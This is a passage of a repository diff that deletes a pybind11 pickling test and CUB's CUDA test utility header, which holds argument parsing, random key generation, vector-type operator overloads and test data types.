extra2) { m_extra2 = extra2; } - int extra1() const { return m_extra1; } - int extra2() const { return m_extra2; } - private: - std::string m_value; - int m_extra1 = 0; - int m_extra2 = 0; - }; - - class PickleableNew : public Pickleable { - public: - using Pickleable::Pickleable; - }; - - py::class_(m, "Pickleable") - .def(py::init()) - .def("value", &Pickleable::value) - .def("extra1", &Pickleable::extra1) - .def("extra2", &Pickleable::extra2) - .def("setExtra1", &Pickleable::setExtra1) - .def("setExtra2", &Pickleable::setExtra2) - // For details on the methods below, refer to - // http://docs.python.org/3/library/pickle.html#pickling-class-instances - .def("__getstate__", [](const Pickleable &p) { - /* Return a tuple that fully encodes the state of the object */ - return py::make_tuple(p.value(), p.extra1(), p.extra2()); - }) - .def("__setstate__", [](Pickleable &p, py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - /* Invoke the constructor (need to use in-place version) */ - new (&p) Pickleable(t[0].cast()); - - /* Assign any additional state */ - p.setExtra1(t[1].cast()); - p.setExtra2(t[2].cast()); - }); - - py::class_(m, "PickleableNew") - .def(py::init()) - .def(py::pickle( - [](const PickleableNew &p) { - return py::make_tuple(p.value(), p.extra1(), p.extra2()); - }, - [](py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - auto p = PickleableNew(t[0].cast()); - - p.setExtra1(t[1].cast()); - p.setExtra2(t[2].cast()); - return p; - } - )); - -#if !defined(PYPY_VERSION) - // test_roundtrip_with_dict - class PickleableWithDict { - public: - PickleableWithDict(const std::string &value) : value(value) { } - - std::string value; - int extra; - }; - - class PickleableWithDictNew : public PickleableWithDict { - public: - using PickleableWithDict::PickleableWithDict; - }; - - py::class_(m, "PickleableWithDict", py::dynamic_attr()) - .def(py::init()) - .def_readwrite("value", &PickleableWithDict::value) - 
.def_readwrite("extra", &PickleableWithDict::extra) - .def("__getstate__", [](py::object self) { - /* Also include __dict__ in state */ - return py::make_tuple(self.attr("value"), self.attr("extra"), self.attr("__dict__")); - }) - .def("__setstate__", [](py::object self, py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - /* Cast and construct */ - auto& p = self.cast(); - new (&p) PickleableWithDict(t[0].cast()); - - /* Assign C++ state */ - p.extra = t[1].cast(); - - /* Assign Python state */ - self.attr("__dict__") = t[2]; - }); - - py::class_(m, "PickleableWithDictNew") - .def(py::init()) - .def(py::pickle( - [](py::object self) { - return py::make_tuple(self.attr("value"), self.attr("extra"), self.attr("__dict__")); - }, - [](const py::tuple &t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - - auto cpp_state = PickleableWithDictNew(t[0].cast()); - cpp_state.extra = t[1].cast(); - - auto py_state = t[2].cast(); - return std::make_pair(cpp_state, py_state); - } - )); -#endif -} diff --git a/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h b/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h deleted file mode 100644 index b2fbd17cc3b9e9de3a37a0ff21e36aa2fdcdff14..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h +++ /dev/null @@ -1,1648 +0,0 @@ -/****************************************************************************** - * Copyright (c) 2011, Duane Merrill. All rights reserved. - * Copyright (c) 2011-2018, NVIDIA CORPORATION. All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * * Neither the name of the NVIDIA CORPORATION nor the - * names of its contributors may be used to endorse or promote products - * derived from this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY - * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
- * - ******************************************************************************/ - - -#pragma once - -#if defined(_WIN32) || defined(_WIN64) - #include - #undef small // Windows is terrible for polluting macro namespace -#else - #include -#endif - -#include - -#include -#include - -#include -#include -#include -#include -#include -#include - -#include "mersenne.h" -#include "half.h" - -#include "cub/util_debug.cuh" -#include "cub/util_device.cuh" -#include "cub/util_type.cuh" -#include "cub/util_macro.cuh" -#include "cub/iterator/discard_output_iterator.cuh" - -/****************************************************************************** - * Type conversion macros - ******************************************************************************/ - -/** - * Return a value of type `T` with the same bitwise representation of `in`. - * Types `T` and `U` must be the same size. - */ -template -T SafeBitCast(const U& in) -{ - static_assert(sizeof(T) == sizeof(U), "Types must be same size."); - T out; - memcpy(&out, &in, sizeof(T)); - return out; -} - -/****************************************************************************** - * Assertion macros - ******************************************************************************/ - -/** - * Assert equals - */ -#define AssertEquals(a, b) if ((a) != (b)) { std::cerr << "\n(" << __FILE__ << ": " << __LINE__ << ")\n"; exit(1);} - - -/****************************************************************************** - * Command-line parsing functionality - ******************************************************************************/ - -/** - * Utility for parsing command line arguments - */ -struct CommandLineArgs -{ - - std::vector keys; - std::vector values; - std::vector args; - cudaDeviceProp deviceProp; - float device_giga_bandwidth; - size_t device_free_physmem; - size_t device_total_physmem; - - /** - * Constructor - */ - CommandLineArgs(int argc, char **argv) : - keys(10), - values(10) - { - using namespace std; - - // Initialize mersenne generator - unsigned int mersenne_init[4]= {0x123, 0x234, 0x345, 0x456}; - mersenne::init_by_array(mersenne_init, 4); - - for (int i = 1; i < argc; i++) - { - string arg = argv[i]; - - if ((arg[0] != '-') || (arg[1] != '-')) - { - args.push_back(arg); - continue; - } - - string::size_type pos; - string key, val; - if ((pos = arg.find('=')) == string::npos) { - key = string(arg, 2, arg.length() - 2); - val = ""; - } else { - key = string(arg, 2, pos - 2); - val = string(arg, pos + 1, arg.length() - 1); - } - - keys.push_back(key); - values.push_back(val); - } - } - - - /** - * Checks whether a flag "--" is present in the commandline - */ - bool CheckCmdLineFlag(const char* arg_name) - { - using namespace std; - - for (int i = 0; i < int(keys.size()); ++i) - { - if (keys[i] == string(arg_name)) - return true; - } - return false; - } - - - /** - * Returns number of naked (non-flag and non-key-value) commandline parameters - */ - template - int NumNakedArgs() - { - return args.size(); - } - - - /** - * Returns the commandline parameter for a given index (not including flags) - */ - template - void GetCmdLineArgument(int index, T &val) - { - using namespace std; - if (index < args.size()) { - istringstream str_stream(args[index]); - str_stream >> val; - } - } - - /** - * Returns the value specified for a given commandline parameter --= - */ - template - void GetCmdLineArgument(const char *arg_name, T &val) - { - using namespace std; - - for (int i = 0; i < int(keys.size()); ++i) - { - if (keys[i] == 
string(arg_name)) - { - istringstream str_stream(values[i]); - str_stream >> val; - } - } - } - - - /** - * Returns the values specified for a given commandline parameter --=,* - */ - template - void GetCmdLineArguments(const char *arg_name, std::vector &vals) - { - using namespace std; - - if (CheckCmdLineFlag(arg_name)) - { - // Clear any default values - vals.clear(); - - // Recover from multi-value string - for (int i = 0; i < keys.size(); ++i) - { - if (keys[i] == string(arg_name)) - { - string val_string(values[i]); - istringstream str_stream(val_string); - string::size_type old_pos = 0; - string::size_type new_pos = 0; - - // Iterate comma-separated values - T val; - while ((new_pos = val_string.find(',', old_pos)) != string::npos) - { - if (new_pos != old_pos) - { - str_stream.width(new_pos - old_pos); - str_stream >> val; - vals.push_back(val); - } - - // skip over comma - str_stream.ignore(1); - old_pos = new_pos + 1; - } - - // Read last value - str_stream >> val; - vals.push_back(val); - } - } - } - } - - - /** - * The number of pairs parsed - */ - int ParsedArgc() - { - return (int) keys.size(); - } - - /** - * Initialize device - */ - cudaError_t DeviceInit(int dev = -1) - { - cudaError_t error = cudaSuccess; - - do - { - int deviceCount; - error = CubDebug(cudaGetDeviceCount(&deviceCount)); - if (error) break; - - if (deviceCount == 0) { - fprintf(stderr, "No devices supporting CUDA.\n"); - exit(1); - } - if (dev < 0) - { - GetCmdLineArgument("device", dev); - } - if ((dev > deviceCount - 1) || (dev < 0)) - { - dev = 0; - } - - error = CubDebug(cudaSetDevice(dev)); - if (error) break; - - CubDebugExit(cudaMemGetInfo(&device_free_physmem, &device_total_physmem)); - - int ptx_version = 0; - error = CubDebug(cub::PtxVersion(ptx_version)); - if (error) break; - - error = CubDebug(cudaGetDeviceProperties(&deviceProp, dev)); - if (error) break; - - if (deviceProp.major < 1) { - fprintf(stderr, "Device does not support CUDA.\n"); - exit(1); - } - - device_giga_bandwidth = float(deviceProp.memoryBusWidth) * deviceProp.memoryClockRate * 2 / 8 / 1000 / 1000; - - if (!CheckCmdLineFlag("quiet")) - { - printf( - "Using device %d: %s (PTX version %d, SM%d, %d SMs, " - "%lld free / %lld total MB physmem, " - "%.3f GB/s @ %d kHz mem clock, ECC %s)\n", - dev, - deviceProp.name, - ptx_version, - deviceProp.major * 100 + deviceProp.minor * 10, - deviceProp.multiProcessorCount, - (unsigned long long) device_free_physmem / 1024 / 1024, - (unsigned long long) device_total_physmem / 1024 / 1024, - device_giga_bandwidth, - deviceProp.memoryClockRate, - (deviceProp.ECCEnabled) ? 
"on" : "off"); - fflush(stdout); - } - - } while (0); - - return error; - } -}; - -/****************************************************************************** - * Random bits generator - ******************************************************************************/ - -int g_num_rand_samples = 0; - - -template -bool IsNaN(T /* val */) { return false; } - -template<> -__noinline__ bool IsNaN(float val) -{ - return std::isnan(val); -} - -template<> -__noinline__ bool IsNaN(float1 val) -{ - return (IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float2 val) -{ - return (IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float3 val) -{ - return (IsNaN(val.z) || IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float4 val) -{ - return (IsNaN(val.y) || IsNaN(val.x) || IsNaN(val.w) || IsNaN(val.z)); -} - -template<> -__noinline__ bool IsNaN(double val) -{ - return std::isnan(val); -} - -template<> -__noinline__ bool IsNaN(double1 val) -{ - return (IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double2 val) -{ - return (IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double3 val) -{ - return (IsNaN(val.z) || IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double4 val) -{ - return (IsNaN(val.y) || IsNaN(val.x) || IsNaN(val.w) || IsNaN(val.z)); -} - - -template<> -__noinline__ bool IsNaN(half_t val) -{ - const auto bits = SafeBitCast(val); - - // commented bit is always true, leaving for documentation: - return (((bits >= 0x7C01) && (bits <= 0x7FFF)) || - ((bits >= 0xFC01) /*&& (bits <= 0xFFFFFFFF)*/)); -} - - - -/** - * Generates random keys. - * - * We always take the second-order byte from rand() because the higher-order - * bits returned by rand() are commonly considered more uniformly distributed - * than the lower-order bits. - * - * We can decrease the entropy level of keys by adopting the technique - * of Thearling and Smith in which keys are computed from the bitwise AND of - * multiple random samples: - * - * entropy_reduction | Effectively-unique bits per key - * ----------------------------------------------------- - * -1 | 0 - * 0 | 32 - * 1 | 25.95 (81%) - * 2 | 17.41 (54%) - * 3 | 10.78 (34%) - * 4 | 6.42 (20%) - * ... | ... 
- * - */ -template -void RandomBits( - K &key, - int entropy_reduction = 0, - int begin_bit = 0, - int end_bit = sizeof(K) * 8) -{ - const int NUM_BYTES = sizeof(K); - const int WORD_BYTES = sizeof(unsigned int); - const int NUM_WORDS = (NUM_BYTES + WORD_BYTES - 1) / WORD_BYTES; - - unsigned int word_buff[NUM_WORDS]; - - if (entropy_reduction == -1) - { - memset((void *) &key, 0, sizeof(key)); - return; - } - - if (end_bit < 0) - end_bit = sizeof(K) * 8; - - while (true) - { - // Generate random word_buff - for (int j = 0; j < NUM_WORDS; j++) - { - int current_bit = j * WORD_BYTES * 8; - - unsigned int word = 0xffffffff; - word &= 0xffffffff << CUB_MAX(0, begin_bit - current_bit); - word &= 0xffffffff >> CUB_MAX(0, (current_bit + (WORD_BYTES * 8)) - end_bit); - - for (int i = 0; i <= entropy_reduction; i++) - { - // Grab some of the higher bits from rand (better entropy, supposedly) - word &= mersenne::genrand_int32(); - g_num_rand_samples++; - } - - word_buff[j] = word; - } - - memcpy(&key, word_buff, sizeof(K)); - - K copy = key; - if (!IsNaN(copy)) - break; // avoids NaNs when generating random floating point numbers - } -} - -/// Randomly select number between [0:max) -template -T RandomValue(T max) -{ - unsigned int bits; - unsigned int max_int = (unsigned int) -1; - do { - RandomBits(bits); - } while (bits == max_int); - - return (T) ((double(bits) / double(max_int)) * double(max)); -} - - -/****************************************************************************** - * Console printing utilities - ******************************************************************************/ - -/** - * Helper for casting character types to integers for cout printing - */ -template -T CoutCast(T val) { return val; } - -int CoutCast(char val) { return val; } - -int CoutCast(unsigned char val) { return val; } - -int CoutCast(signed char val) { return val; } - - - -/****************************************************************************** - * Test value initialization utilities - ******************************************************************************/ - -/** - * Test problem generation options - */ -enum GenMode -{ - UNIFORM, // Assign to '2', regardless of integer seed - INTEGER_SEED, // Assign to integer seed - RANDOM, // Assign to random, regardless of integer seed - RANDOM_BIT, // Assign to randomly chosen 0 or 1, regardless of integer seed -}; - -/** - * Initialize value - */ -template -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) -{ - switch (gen_mode) - { -#if (CUB_PTX_ARCH == 0) - case RANDOM: - RandomBits(value); - break; - case RANDOM_BIT: - char c; - RandomBits(c, 0, 0, 1); - value = (c > 0) ? 
(T) 1 : (T) -1; - break; -#endif - case UNIFORM: - value = 2; - break; - case INTEGER_SEED: - default: - value = (T) index; - break; - } -} - - -/** - * Initialize value (bool) - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, bool &value, int index = 0) -{ - switch (gen_mode) - { -#if (CUB_PTX_ARCH == 0) - case RANDOM: - case RANDOM_BIT: - char c; - RandomBits(c, 0, 0, 1); - value = (c > 0); - break; -#endif - case UNIFORM: - value = true; - break; - case INTEGER_SEED: - default: - value = (index > 0); - break; - } -} - - -/** - * cub::NullType test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode /* gen_mode */, - cub::NullType &/* value */, - int /* index */ = 0) -{} - - -/** - * cub::KeyValuePairtest initialization - */ -template -__host__ __device__ __forceinline__ void InitValue( - GenMode gen_mode, - cub::KeyValuePair& value, - int index = 0) -{ - InitValue(gen_mode, value.value, index); - - // Assign corresponding flag with a likelihood of the last bit being set with entropy-reduction level 3 - RandomBits(value.key, 3); - value.key = (value.key & 0x1); -} - - - -/****************************************************************************** - * Comparison and ostream operators - ******************************************************************************/ - -/** - * KeyValuePair ostream operator - */ -template -std::ostream& operator<<(std::ostream& os, const cub::KeyValuePair &val) -{ - os << '(' << CoutCast(val.key) << ',' << CoutCast(val.value) << ')'; - return os; -} - - -/****************************************************************************** - * Comparison and ostream operators for CUDA vector types - ******************************************************************************/ - -/** - * Vector1 overloads - */ -#define CUB_VEC_OVERLOAD_1(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' << CoutCast(val.x) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - return (a.x > b.x); \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - return (a.x < b.x); \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T(a.x + b.x); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace std */ - - - -/** - * Vector2 overloads - */ -#define CUB_VEC_OVERLOAD_2(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - 
const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - return a.y > b.y; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - return a.y < b.y; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - - - -/** - * Vector3 overloads - */ -#define CUB_VEC_OVERLOAD_3(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ',' \ - << CoutCast(val.z) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y) || \ - (a.z != b.z); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y) && \ - (a.z == b.z); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - InitValue(gen_mode, value.z, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - if (a.y > b.y) return true; else if (b.y > a.y) return false; \ - return a.z > b.z; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - if (a.y < b.y) return true; else if (b.y < a.y) return false; \ - return a.z < b.z; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y, \ - a.z + b.z); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct 
NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - - -/** - * Vector4 overloads - */ -#define CUB_VEC_OVERLOAD_4(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ',' \ - << CoutCast(val.z) << ',' \ - << CoutCast(val.w) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y) || \ - (a.z != b.z) || \ - (a.w != b.w); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y) && \ - (a.z == b.z) && \ - (a.w == b.w); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - InitValue(gen_mode, value.z, index); \ - InitValue(gen_mode, value.w, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - if (a.y > b.y) return true; else if (b.y > a.y) return false; \ - if (a.z > b.z) return true; else if (b.z > a.z) return false; \ - return a.w > b.w; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - if (a.y < b.y) return true; else if (b.y < a.y) return false; \ - if (a.z < b.z) return true; else if (b.z < a.z) return false; \ - return a.w < b.w; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y, \ - a.z + b.z, \ - a.w + b.w); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - -/** - * All vector overloads - */ -#define CUB_VEC_OVERLOAD(COMPONENT_T, BaseT) \ - CUB_VEC_OVERLOAD_1(COMPONENT_T##1, BaseT) \ - CUB_VEC_OVERLOAD_2(COMPONENT_T##2, BaseT) \ - CUB_VEC_OVERLOAD_3(COMPONENT_T##3, BaseT) \ - CUB_VEC_OVERLOAD_4(COMPONENT_T##4, BaseT) - -/** - * Define for types - */ -CUB_VEC_OVERLOAD(char, char) -CUB_VEC_OVERLOAD(short, short) -CUB_VEC_OVERLOAD(int, int) -CUB_VEC_OVERLOAD(long, long) -CUB_VEC_OVERLOAD(longlong, long long) -CUB_VEC_OVERLOAD(uchar, unsigned char) -CUB_VEC_OVERLOAD(ushort, 
unsigned short) -CUB_VEC_OVERLOAD(uint, unsigned int) -CUB_VEC_OVERLOAD(ulong, unsigned long) -CUB_VEC_OVERLOAD(ulonglong, unsigned long long) -CUB_VEC_OVERLOAD(float, float) -CUB_VEC_OVERLOAD(double, double) - - -//--------------------------------------------------------------------- -// Complex data type TestFoo -//--------------------------------------------------------------------- - -/** - * TestFoo complex data type - */ -struct TestFoo -{ - long long x; - int y; - short z; - char w; - - // Factory - static __host__ __device__ __forceinline__ TestFoo MakeTestFoo(long long x, int y, short z, char w) - { - TestFoo retval = {x, y, z, w}; - return retval; - } - - // Assignment from int operator - __host__ __device__ __forceinline__ TestFoo& operator =(int b) - { - x = b; - y = b; - z = b; - w = b; - return *this; - } - - // Summation operator - __host__ __device__ __forceinline__ TestFoo operator+(const TestFoo &b) const - { - return MakeTestFoo(x + b.x, y + b.y, z + b.z, w + b.w); - } - - // Inequality operator - __host__ __device__ __forceinline__ bool operator !=(const TestFoo &b) const - { - return (x != b.x) || (y != b.y) || (z != b.z) || (w != b.w); - } - - // Equality operator - __host__ __device__ __forceinline__ bool operator ==(const TestFoo &b) const - { - return (x == b.x) && (y == b.y) && (z == b.z) && (w == b.w); - } - - // Less than operator - __host__ __device__ __forceinline__ bool operator <(const TestFoo &b) const - { - if (x < b.x) return true; else if (b.x < x) return false; - if (y < b.y) return true; else if (b.y < y) return false; - if (z < b.z) return true; else if (b.z < z) return false; - return w < b.w; - } - - // Greater than operator - __host__ __device__ __forceinline__ bool operator >(const TestFoo &b) const - { - if (x > b.x) return true; else if (b.x > x) return false; - if (y > b.y) return true; else if (b.y > y) return false; - if (z > b.z) return true; else if (b.z > z) return false; - return w > b.w; - } - -}; - -/** - * TestFoo ostream operator - */ -std::ostream& operator<<(std::ostream& os, const TestFoo& val) -{ - os << '(' << val.x << ',' << val.y << ',' << val.z << ',' << CoutCast(val.w) << ')'; - return os; -} - -/** - * TestFoo test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, TestFoo &value, int index = 0) -{ - InitValue(gen_mode, value.x, index); - InitValue(gen_mode, value.y, index); - InitValue(gen_mode, value.z, index); - InitValue(gen_mode, value.w, index); -} - - -/// numeric_limits specialization -namespace cub { -template<> -struct NumericTraits -{ - static const Category CATEGORY = NOT_A_NUMBER; - enum { - PRIMITIVE = false, - NULL_TYPE = false, - }; - static TestFoo Max() - { - return TestFoo::MakeTestFoo( - NumericTraits::Max(), - NumericTraits::Max(), - NumericTraits::Max(), - NumericTraits::Max()); - } - - static TestFoo Lowest() - { - return TestFoo::MakeTestFoo( - NumericTraits::Lowest(), - NumericTraits::Lowest(), - NumericTraits::Lowest(), - NumericTraits::Lowest()); - } -}; -} // namespace cub - - -//--------------------------------------------------------------------- -// Complex data type TestBar (with optimizations for fence-free warp-synchrony) -//--------------------------------------------------------------------- - -/** - * TestBar complex data type - */ -struct TestBar -{ - long long x; - int y; - - // Constructor - __host__ __device__ __forceinline__ TestBar() : x(0), y(0) - {} - - // Constructor - __host__ __device__ __forceinline__ TestBar(int b) : x(b), y(b) - {} - - 
// Constructor - __host__ __device__ __forceinline__ TestBar(long long x, int y) : x(x), y(y) - {} - - // Assignment from int operator - __host__ __device__ __forceinline__ TestBar& operator =(int b) - { - x = b; - y = b; - return *this; - } - - // Summation operator - __host__ __device__ __forceinline__ TestBar operator+(const TestBar &b) const - { - return TestBar(x + b.x, y + b.y); - } - - // Inequality operator - __host__ __device__ __forceinline__ bool operator !=(const TestBar &b) const - { - return (x != b.x) || (y != b.y); - } - - // Equality operator - __host__ __device__ __forceinline__ bool operator ==(const TestBar &b) const - { - return (x == b.x) && (y == b.y); - } - - // Less than operator - __host__ __device__ __forceinline__ bool operator <(const TestBar &b) const - { - if (x < b.x) return true; else if (b.x < x) return false; - return y < b.y; - } - - // Greater than operator - __host__ __device__ __forceinline__ bool operator >(const TestBar &b) const - { - if (x > b.x) return true; else if (b.x > x) return false; - return y > b.y; - } - -}; - - -/** - * TestBar ostream operator - */ -std::ostream& operator<<(std::ostream& os, const TestBar& val) -{ - os << '(' << val.x << ',' << val.y << ')'; - return os; -} - -/** - * TestBar test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, TestBar &value, int index = 0) -{ - InitValue(gen_mode, value.x, index); - InitValue(gen_mode, value.y, index); -} - -/// numeric_limits specialization -namespace cub { -template<> -struct NumericTraits -{ - static const Category CATEGORY = NOT_A_NUMBER; - enum { - PRIMITIVE = false, - NULL_TYPE = false, - }; - static TestBar Max() - { - return TestBar( - NumericTraits::Max(), - NumericTraits::Max()); - } - - static TestBar Lowest() - { - return TestBar( - NumericTraits::Lowest(), - NumericTraits::Lowest()); - } -}; -} // namespace cub - - -/****************************************************************************** - * Helper routines for list comparison and display - ******************************************************************************/ - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(T* computed, S* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != 